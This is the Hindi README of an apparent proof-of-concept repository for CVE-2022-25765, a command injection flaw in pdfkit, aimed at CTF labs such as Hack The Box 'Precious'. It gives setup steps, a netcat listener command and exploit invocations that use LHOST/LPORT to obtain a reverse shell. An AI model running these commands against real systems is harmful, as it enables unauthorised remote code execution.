
CVE-2022-25765 के लिए पायथन प्रूफ-ऑफ-कॉन्सेप्ट, pdfkit में एक कमांड इंजेक्शन भेद्यता, जो क्राफ्टेड PDF जनरेशन के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाती है।
CVE-2022-25765 के लिए PoC, जो pdfkit के कमजोर संस्करणों को प्रभावित करता है।
pdfkit 0.8.6 के साथ परीक्षण किया गया।
requestscoloramaनिर्भरताएँ स्थापित करें:
pip3 install -r requirements.txt
या मैन्युअल रूप से:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
उदाहरण: एक लिसनर चलाएँ
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
रिपॉजिटरी को क्लोन करें:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
आवश्यकताएँ स्थापित करें:
pip3 install -r requirements.txt
अपने लैब टारगेट के विरुद्ध PoC चलाएँ।
CVE-2022-25765 pdfkit के कमजोर संस्करणों में एक कमांड इंजेक्शन भेद्यता है।
यह समस्या PDF जनरेशन प्रक्रिया में पारित उपयोगकर्ता-नियंत्रित इनपुट के अपर्याप्त सैनिटाइज़ेशन से संबंधित है।
यह PoC मुख्य रूप से सीखने और CTF/लैब वातावरण के लिए बनाया गया है।
यदि आप इसे आज़माने के लिए जगह ढूंढ रहे हैं, तो Hack The Box : मशीन: Precious।
इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
इस प्रोजेक्ट के कारण होने वाले दुरुपयोग या क्षति के लिए मैं जिम्मेदार नहीं हूँ।
INNOCENTx0